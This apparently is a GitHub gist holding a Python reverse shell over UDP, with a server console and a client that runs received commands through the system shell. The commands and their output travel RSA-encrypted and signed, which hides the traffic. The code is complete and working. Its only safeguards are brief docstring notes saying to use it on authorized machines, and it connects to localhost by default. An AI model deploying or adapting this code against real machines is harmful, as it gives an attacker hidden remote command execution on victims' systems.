Skip to content

Instantly share code, notes, and snippets.

@0x07CB
Created February 1, 2024 16:23
Show Gist options
  • Save 0x07CB/616279732a5757c1c69251275ab616d7 to your computer and use it in GitHub Desktop.
Save 0x07CB/616279732a5757c1c69251275ab616d7 to your computer and use it in GitHub Desktop.
Reverse Shell over UDP with RSA encryption
pyasn1==0.5.1
rsa==4.9
#coding: utf-8
import rsa
import socket
class UDP_Server:
    """Small fluent wrapper around an IPv4 UDP socket.

    The socket is created in the constructor but only bound when
    :meth:`bind` is called. ``bind``, ``send_data`` and ``close`` return the
    instance so calls can be chained.
    """

    def __init__(self, host, port):
        self.host, self.port = host, port
        self.sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)

    def bind(self):
        """Bind the socket to ``(host, port)`` and return ``self``."""
        endpoint = (self.host, self.port)
        self.sock.bind(endpoint)
        return self

    def send_data(self, data, address):
        """Send the bytes *data* as one datagram to *address*; return ``self``."""
        self.sock.sendto(data, address)
        return self

    def recv_data(self, size):
        """Receive one datagram of at most *size* bytes.

        Returns the ``(data, sender_address)`` pair produced by ``recvfrom``.
        """
        received = self.sock.recvfrom(size)
        return received

    def close(self):
        """Close the underlying socket and return ``self``."""
        self.sock.close()
        return self
class RSA_Communication:
    """Hold an RSA key pair and encrypt/decrypt short messages with it.

    A fresh key pair is generated on construction. Either half can later be
    replaced from PKCS#1 key data through the ``load_*_PEM`` methods.
    """

    def __init__(self, key_size=4096):
        # Key generation runs on every instantiation.
        self.pubkey, self.privkey = rsa.newkeys(key_size)

    @staticmethod
    def _as_bytes(data):
        """Return *data* unchanged if it is ``bytes``, else its UTF-8 encoding.

        ``isinstance`` is used so that ``bytes`` subclasses pass through
        instead of being sent to a non-existent ``.encode`` method.
        """
        return data if isinstance(data, bytes) else data.encode('utf-8')

    def get_pubkey_PEM(self):
        """Return the public key serialized as PKCS#1 PEM bytes."""
        return self.pubkey.save_pkcs1('PEM')

    def get_privkey_PEM(self):
        """Return the private key serialized as PKCS#1 PEM bytes."""
        return self.privkey.save_pkcs1('PEM')

    def load_pubkey_PEM(self, keydata):
        """Replace the public key with the one parsed from *keydata*; return ``self``."""
        self.pubkey = rsa.PublicKey.load_pkcs1(keydata)
        return self

    def load_privkey_PEM(self, keydata):
        """Replace the private key with the one parsed from *keydata*; return ``self``."""
        self.privkey = rsa.PrivateKey.load_pkcs1(keydata)
        return self

    def encrypt(self, data):
        """Encrypt *data* (``bytes``, or ``str`` encoded as UTF-8) with the public key."""
        return rsa.encrypt(self._as_bytes(data), self.pubkey)

    def decrypt(self, data):
        """Decrypt the ciphertext *data* with the private key.

        A ``str`` argument is UTF-8 encoded first, as before; ciphertext
        received from a socket is already ``bytes``.
        """
        return rsa.decrypt(self._as_bytes(data), self.privkey)
class RSA_Signature:
    """Sign and verify messages with RSA keys supplied as PKCS#1 key data.

    ``hash_method`` names the digest used when signing and the digest a
    signature must have been made with for :meth:`check_signature` to accept
    it. ``key_size`` is only stored; no method of this class reads it.
    """

    def __init__(self, hash_method='SHA-1', key_size=4096):
        self.hash_method = hash_method
        self.key_size = key_size

    @staticmethod
    def _as_bytes(data):
        """Return *data* unchanged if it is ``bytes``, else its UTF-8 encoding."""
        return data if isinstance(data, bytes) else data.encode('utf-8')

    def sign(self, data, privkey):
        """Return the signature of *data* made with the serialized key *privkey*."""
        private_key = rsa.PrivateKey.load_pkcs1(privkey)
        return rsa.sign(self._as_bytes(data), private_key, self.hash_method)

    def verify(self, data, signature, pubkey):
        """Verify *signature* over *data* with the serialized key *pubkey*.

        Returns whatever ``rsa.verify`` returns (the name of the hash that was
        used, which ``check_signature`` compares with ``hash_method``) and
        lets ``rsa.pkcs1.VerificationError`` propagate on a bad signature.
        """
        public_key = rsa.PublicKey.load_pkcs1(pubkey)
        return rsa.verify(self._as_bytes(data), signature, public_key)

    def check_signature(self, data, signature, pubkey):
        """Return ``True`` only for a valid signature made with ``hash_method``.

        A signature that fails verification, or that verifies but was made
        with a different hash than the configured one, yields ``False``.
        """
        try:
            used_hash = self.verify(data, signature, pubkey)
        except rsa.pkcs1.VerificationError:
            return False
        return used_hash == self.hash_method
def _recv_from_peer(server, peer_address, size=1024):
    """Return the next datagram sent by *peer_address*, dropping any others.

    UDP is connectionless, so any host can deliver a datagram to the bound
    port; ignoring foreign senders keeps the four-part reply in step.
    """
    while True:
        data, sender = server.recv_data(size)
        if sender == peer_address:
            return data


def main():
    """Run the interactive operator console on 127.0.0.1:12345.

    Only use this against systems you are authorized to test: every line
    typed at the prompt is sent to the peer for execution.

    Protocol, as implemented here:

    1. The first datagram received is taken as the peer's public key (it is
       not authenticated in any way) and our public key is sent back.
    2. Each command is sent as two datagrams: the command encrypted with the
       peer's key, then a signature made with our private key.
    3. Four datagrams are read back (stdout ciphertext, stdout signature,
       stderr ciphertext, stderr signature). The output is printed only when
       both signatures verify against the peer's key.

    A command containing the substring ``terminate`` is still sent, after
    which the loop ends. The socket is closed on every exit path.
    """
    server = UDP_Server("127.0.0.1", 12345)
    try:
        server.bind()
        rsa_comm = RSA_Communication()
        pubkey = rsa_comm.get_pubkey_PEM()
        privkey = rsa_comm.get_privkey_PEM()
        print("Serveur en attente de connexion...")
        client_pubkey, client_address = server.recv_data(1024)
        print("Tentative de connexion entrante de: ", client_address)
        print("Clé publique du client reçue.")
        # Parse the peer key once; a malformed key fails here instead of
        # after the first command has been typed.
        client_key = rsa.PublicKey.load_pkcs1(client_pubkey)
        print("Connexion établie avec le client: ", client_address)
        server.send_data(pubkey, client_address)
        auth_sign = RSA_Signature('SHA-1', 4096)
        while True:
            command_text = input("shell>> ")
            terminate = 'terminate' in command_text
            shell_command = command_text.encode('utf-8')
            try:
                encrypted_command = rsa.encrypt(shell_command, client_key)
            except OverflowError:
                # rsa.encrypt refuses messages that do not fit in one padded
                # RSA block; nothing has been sent yet, so just prompt again.
                print("Commande trop longue pour être chiffrée; rien n'a été envoyé.")
                continue
            shell_command_signature = auth_sign.sign(shell_command, privkey)
            server.send_data(encrypted_command, client_address)
            server.send_data(shell_command_signature, client_address)
            if terminate:
                break
            # Every part of the reply must come from the peer that performed
            # the key exchange, not merely from a consistent sender.
            crypt_shell_stdout = _recv_from_peer(server, client_address)
            signature_shell_stdout = _recv_from_peer(server, client_address)
            crypt_shell_stderr = _recv_from_peer(server, client_address)
            signature_shell_stderr = _recv_from_peer(server, client_address)
            try:
                shell_stdout = rsa_comm.decrypt(crypt_shell_stdout)
                shell_stderr = rsa_comm.decrypt(crypt_shell_stderr)
            except rsa.pkcs1.DecryptionError:
                print("Réponse ignorée: échec du déchiffrement.")
                continue
            stdout_ok = auth_sign.check_signature(shell_stdout, signature_shell_stdout, client_pubkey)
            stderr_ok = auth_sign.check_signature(shell_stderr, signature_shell_stderr, client_pubkey)
            if stdout_ok and stderr_ok:
                # Command output is arbitrary bytes; never crash on non-UTF-8.
                print(shell_stdout.decode(errors='replace'))
                print(shell_stderr.decode(errors='replace'))
            else:
                print("Réponse ignorée: signature invalide.")
    finally:
        server.close()


if __name__ == "__main__":
    main()
#coding: utf-8
import rsa
import socket
import subprocess
class UDP_Client:
    """Small fluent wrapper around an unbound IPv4 UDP socket.

    ``host`` and ``port`` are stored on the instance; the destination of each
    datagram is given explicitly to :meth:`send_data`. ``send_data`` and
    ``close`` return the instance so calls can be chained.
    """

    def __init__(self, host, port):
        self.host, self.port = host, port
        self.sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)

    def send_data(self, data, address):
        """Send the bytes *data* as one datagram to *address*; return ``self``."""
        self.sock.sendto(data, address)
        return self

    def recv_data(self, size):
        """Receive one datagram of at most *size* bytes.

        Returns the ``(data, sender_address)`` pair produced by ``recvfrom``.
        """
        received = self.sock.recvfrom(size)
        return received

    def close(self):
        """Close the underlying socket and return ``self``."""
        self.sock.close()
        return self
class RSA_Communication:
    """Hold an RSA key pair and encrypt/decrypt short messages with it.

    A fresh key pair is generated on construction. Either half can later be
    replaced from PKCS#1 key data through the ``load_*_PEM`` methods.
    """

    def __init__(self, key_size=4096):
        # Key generation runs on every instantiation.
        self.pubkey, self.privkey = rsa.newkeys(key_size)

    @staticmethod
    def _as_bytes(data):
        """Return *data* unchanged if it is ``bytes``, else its UTF-8 encoding.

        ``isinstance`` is used so that ``bytes`` subclasses pass through
        instead of being sent to a non-existent ``.encode`` method.
        """
        return data if isinstance(data, bytes) else data.encode('utf-8')

    def get_pubkey_PEM(self):
        """Return the public key serialized as PKCS#1 PEM bytes."""
        return self.pubkey.save_pkcs1('PEM')

    def get_privkey_PEM(self):
        """Return the private key serialized as PKCS#1 PEM bytes."""
        return self.privkey.save_pkcs1('PEM')

    def load_pubkey_PEM(self, keydata):
        """Replace the public key with the one parsed from *keydata*; return ``self``."""
        self.pubkey = rsa.PublicKey.load_pkcs1(keydata)
        return self

    def load_privkey_PEM(self, keydata):
        """Replace the private key with the one parsed from *keydata*; return ``self``."""
        self.privkey = rsa.PrivateKey.load_pkcs1(keydata)
        return self

    def encrypt(self, data):
        """Encrypt *data* (``bytes``, or ``str`` encoded as UTF-8) with the public key."""
        return rsa.encrypt(self._as_bytes(data), self.pubkey)

    def decrypt(self, data):
        """Decrypt the ciphertext *data* with the private key.

        A ``str`` argument is UTF-8 encoded first, as before; ciphertext
        received from a socket is already ``bytes``.
        """
        return rsa.decrypt(self._as_bytes(data), self.privkey)
class RSA_Signature:
    """Sign and verify messages with RSA keys supplied as PKCS#1 key data.

    ``hash_method`` names the digest used when signing and the digest a
    signature must have been made with for :meth:`check_signature` to accept
    it. ``key_size`` is only stored; no method of this class reads it.
    """

    def __init__(self, hash_method='SHA-1', key_size=4096):
        self.hash_method = hash_method
        self.key_size = key_size

    @staticmethod
    def _as_bytes(data):
        """Return *data* unchanged if it is ``bytes``, else its UTF-8 encoding."""
        return data if isinstance(data, bytes) else data.encode('utf-8')

    def sign(self, data, privkey):
        """Return the signature of *data* made with the serialized key *privkey*."""
        private_key = rsa.PrivateKey.load_pkcs1(privkey)
        return rsa.sign(self._as_bytes(data), private_key, self.hash_method)

    def verify(self, data, signature, pubkey):
        """Verify *signature* over *data* with the serialized key *pubkey*.

        Returns whatever ``rsa.verify`` returns (the name of the hash that was
        used, which ``check_signature`` compares with ``hash_method``) and
        lets ``rsa.pkcs1.VerificationError`` propagate on a bad signature.
        """
        public_key = rsa.PublicKey.load_pkcs1(pubkey)
        return rsa.verify(self._as_bytes(data), signature, public_key)

    def check_signature(self, data, signature, pubkey):
        """Return ``True`` only for a valid signature made with ``hash_method``.

        A signature that fails verification, or that verifies but was made
        with a different hash than the configured one, yields ``False``.
        """
        try:
            used_hash = self.verify(data, signature, pubkey)
        except rsa.pkcs1.VerificationError:
            return False
        return used_hash == self.hash_method
def _recv_from_peer(client, peer_address, size=1024):
    """Return the next datagram sent by *peer_address*, dropping any others.

    UDP is connectionless, so any host can deliver a datagram to this socket;
    ignoring foreign senders keeps command/signature pairs in step.
    """
    while True:
        data, sender = client.recv_data(size)
        if sender == peer_address:
            return data


def main():
    """Run the command-executing endpoint that talks to 127.0.0.1:12345.

    WARNING: this executes, through the shell, every correctly signed command
    received from the peer. Run it only on machines you own or are explicitly
    authorized to test.

    Protocol, as implemented here:

    1. Send our public key to the server; the first datagram received in
       reply is taken as the server's public key (it is not authenticated).
    2. Repeatedly read a command ciphertext and its signature, both of which
       must come from the address that answered the key exchange.
    3. If the signature verifies against the server key, run the command and
       send back four datagrams: encrypted stdout, its signature, encrypted
       stderr, its signature.

    A verified command containing the substring ``terminate`` ends the loop.
    The socket is closed on every exit path.

    NOTE: ``rsa.encrypt`` handles a single RSA block, so output too large for
    one block raises ``OverflowError`` here. Lifting that limit needs a
    protocol change on both sides and is deliberately left alone.
    """
    rsa_comm = RSA_Communication()
    pubkey = rsa_comm.get_pubkey_PEM()
    privkey = rsa_comm.get_privkey_PEM()
    client = UDP_Client("127.0.0.1", 12345)
    try:
        client.send_data(pubkey, ("127.0.0.1", 12345))
        server_pubkey, server_address = client.recv_data(1024)
        # Parse the server key once instead of twice per command.
        server_key = rsa.PublicKey.load_pkcs1(server_pubkey, 'PEM')
        auth_sign = RSA_Signature('SHA-1', 4096)
        while True:
            encrypted_command = _recv_from_peer(client, server_address)
            signature_command = _recv_from_peer(client, server_address)
            try:
                command = rsa_comm.decrypt(encrypted_command).decode('utf-8')
            except (rsa.pkcs1.DecryptionError, UnicodeDecodeError):
                # A datagram that is not a valid command for our key is
                # dropped rather than allowed to crash the loop.
                continue
            if not auth_sign.check_signature(command, signature_command, server_pubkey):
                continue
            if 'terminate' in command:
                break
            CMD = subprocess.Popen(
                command,
                shell=True,
                stdout=subprocess.PIPE,
                stderr=subprocess.PIPE,
                stdin=subprocess.PIPE,
            )
            # communicate() closes stdin, drains both pipes concurrently and
            # reaps the child; reading stdout then stderr in sequence can
            # deadlock once the stderr pipe buffer fills.
            clear_stdout, clear_stderr = CMD.communicate()
            encrypted_stdout = rsa.encrypt(clear_stdout, server_key)
            encrypted_stderr = rsa.encrypt(clear_stderr, server_key)
            client.send_data(encrypted_stdout, server_address)
            client.send_data(auth_sign.sign(clear_stdout, privkey), server_address)
            client.send_data(encrypted_stderr, server_address)
            client.send_data(auth_sign.sign(clear_stderr, privkey), server_address)
    finally:
        client.close()


if __name__ == "__main__":
    main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment